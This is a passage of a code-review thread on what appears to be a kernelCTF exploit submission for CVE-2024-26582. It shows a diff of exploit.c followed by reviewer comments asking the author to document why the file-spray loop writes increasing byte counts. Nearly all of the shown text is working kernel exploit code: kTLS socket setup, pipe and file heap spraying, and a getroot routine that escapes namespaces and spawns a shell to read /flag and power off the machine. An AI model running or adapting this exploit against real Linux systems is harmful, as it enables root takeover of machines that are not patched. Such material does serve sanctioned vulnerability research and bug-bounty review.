pocs/linux/kernelctf/CVE-2024-26582_mitigation/exploit/mitigation-v4-6.6/exploit.c

```diff
@@ -0,0 +1,462 @@
+    struct sockaddr_in server_addr;
+
+    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
+        perror("socket");
+        exit(1);
+    }
+
+    memset(&server_addr, 0, sizeof(server_addr));
+    server_addr.sin_family = AF_INET;
+    server_addr.sin_port = htons(PORT);
+    inet_pton(AF_INET, "0.0.0.0", &server_addr.sin_addr);
+
+    if (connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
+        perror("connect");
+        close(sockfd);
+        exit(1);
+    }
+
+    if (setup_ktls(sockfd, 1) < 0) {
+        close(sockfd);
+        exit(1);
+    }
+
+    char buf[0x400];
+
+    if (send(sockfd, buf, sizeof(buf), 0) < 0) {
+        perror("sendmsg");
+    } else {
+    }
+
+}
+
+#define PIPE_SPRAY_NUM 100
+int pipe_fd[PIPE_SPRAY_NUM][2];
+char save_page[0x1000];
+
+void getroot(void)
+{
+    char tmp[0x1000];
+    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
+        SYSCHK(write(pipe_fd[i][1], save_page, sizeof(save_page))); // restore page
+        SYSCHK(read(pipe_fd[i][0], tmp, sizeof(tmp)));
+    }
+
+    puts("[+] We are Ro0ot!");
+    setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
+    setns(open("/proc/1/ns/pid", O_RDONLY), 0);
+    setns(open("/proc/1/ns/net", O_RDONLY), 0);
+    
+    char* shell[] = {
+        "/bin/sh",
+        "-c",
+        "/bin/cat /flag && echo ; echo o>/proc/sysrq-trigger",
+        NULL,
+    };
+    execve(shell[0], shell, NULL);
+}
+
+void spray_pipe() {
+    char buf[0x1000];
+    memset(buf, 'C', sizeof(buf));
+
+    for (int i = 0; i < PIPE_SPRAY_NUM; i++) {
+        write(pipe_fd[i][1], buf, sizeof(buf));
+        usleep(100);
+    }
+}
+
+int main(int argc, char *argv[]) {
+    pin_cpu(0);
+    save_state();
+    if (argc > 1) {
+        PORT = atoi(argv[1]);
+    }
+    else {
+        srand(time(NULL));
+
+        PORT = rand() % (65535 - 1024 + 1) + 1024;
+    }
+    int sock = socket(AF_ALG, SOCK_SEQPACKET, 0);
+    struct sockaddr_alg sa = {
+        .salg_family = AF_ALG,
+        .salg_type = "aead",
+        .salg_name = "cryptd(ccm(aes))",
+    };
+    bind(sock, (struct sockaddr *)&sa, sizeof(sa));
+    for (int i = 0; i < PIPE_SPRAY_NUM; i ++) {
+
+        if (pipe(pipe_fd[i]) < 0) {
+            printf("[x] failed to alloc %d pipe!", i);
+            die("FAILED to create pipe!");
+        }
+    }
+    int pipes[2];
+    pipe(pipes);
+
+    pid_t pid = fork();
+
+    if (pid < 0) {
+        perror("fork");
+        exit(1);
+    }
+
+    if (pid == 0) {
+        run_server(pipes[0]);
+        puts("Server done");
+
+    } else {
+        pthread_t p;
+        pthread_create(&p, 0, run_client, 0);
+        pthread_join(p, 0);
+    }
+    pin_cpu(1);
+    spray_pipe();
+  
+    SYSCHK(write(pipes[1], "A", 1));
+    usleep(50);
+    int spray_fds[0x80];
+    char buff[1024] = {};
+    for (int i = 0; i < sizeof(spray_fds)/4; i++) {
+        spray_fds[i] = SYSCHK(open("/tmp/tmp_file", O_RDWR | O_CREAT, 0666));
+        SYSCHK(write(spray_fds[i], buff, i));
```

Comment:
Can you add a source code or write-up comment why are you writing `i` number of bytes (so first 0 bytes, then 1 byte, then 2 bytes, etc)?

Because later you use the `f_pos` field to determine what is your victim object. It's an important step.

Reply:
Can you please make a comment about this into the writeup and/or source code?